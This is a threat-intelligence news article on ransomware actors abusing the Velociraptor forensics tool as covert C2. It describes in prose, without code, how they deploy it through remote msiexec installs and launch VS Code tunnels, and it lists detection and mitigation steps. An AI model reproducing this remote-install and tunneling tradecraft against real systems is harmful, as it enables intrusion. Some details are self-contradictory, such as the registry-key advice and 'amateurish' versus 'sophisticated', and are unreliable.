Security researchers report that attackers have begun using Velociraptor, a legitimate digital forensics and incident response tool, as a covert command-and-control mechanism in ransomware campaigns. In recent incidents, adversaries installed Velociraptor on compromised hosts, configured it to communicate with attacker-controlled servers, and used it to download and execute tools such as Visual Studio Code with tunneling to maintain remote access before deploying payloads.
Attackers Install Velociraptor via MSI and Use Tunneling Through VS Code for C2
In observed campaigns, threat actors gained initial access through standard entry vectors—phishing emails, exposed RDP, or vulnerable services—and then launched an MSI installer via Windows msiexec to deploy Velociraptor. The installer was hosted on Cloudflare Workers domains and configured Velociraptor to contact a command-and-control (C2) domain managed by the adversary.
Velociraptor was then used to download and launch Visual Studio Code in tunnel mode, enabling remote access channels for the attackers. In several cases, the actors subsequently installed additional malware through further MSI downloads, staging ransomware or backdoors.
Because Velociraptor is a legitimate tool, its process signatures and network patterns may appear benign, making it easier for attackers to blend with normal system activity. Analysts caution that unexpected or unauthorized Velociraptor installations should be treated as high-risk indicators of malicious behavior.
Misuse of Forensics Tools Signals Sophisticated Ransomware Tradecraft
Researchers have observed attackers using Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability (CVE-2025-6264) that may have been leveraged in some attacks. Once installed, the amateurish misuse of standard tooling bypasses many signature-based detections, enabling lateral movement and data staging without deploying obvious malware.
In multiple cases linked to this technique, attackers have targeted virtualized environments, including VMware ESXi hosts, to expand access and impact. The combination of legitimate tooling, tunneling via code editors, and staged payloads demonstrates an evolved, stealth-focused ransomware approach.
Security specialists emphasize that defenders must reconsider trust boundaries for forensic and administrative utilities and monitor deviations in their usage—especially those performing downloads, tunneling, or cross-network execution.
Defensive Measures and Detection Strategies Against Velociraptor Abuse
Incident response providers and vendors have issued guidance for detecting and mitigating Velociraptor misuse. Recommended strategies include:
- Monitoring for MLS-style MSI installations or use of msiexec with remote domain names
- Identifying Velociraptor agents configured to communicate with nonstandard or unusual endpoints
- Flagging processes invoking VS Code or tunneling subcomponents launched from Velociraptor agents
- Restricting installation rights to MSI packages and limiting trusted host lists for DFIR tools
- Validating agent configurations against approved server allow-lists and scanning for deviations
Velociraptor’s own documentation also advises watchers to detect abuse by observing creation of a new Windows EventLog source underHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\Velociraptor—a registry key that legitimate installations register automatically.
The misuse trend underscores that defenders should treat any unexplained deployment of DFIR or forensics utilities as a potential red flag. Organizations should also simulate adversarial use of trusted tools during red-teaming to better surface anomalous behaviors before they occur in real attacks.
Investigations into the incidents remain active. Security teams and CERTs are sharing indicators of compromise and telemetry patterns with platform providers to strengthen detection and block reuse of compromised infrastructure. As attackers refine their techniques, defenders must treat even trusted, legitimate tools as potentially weaponized assets.
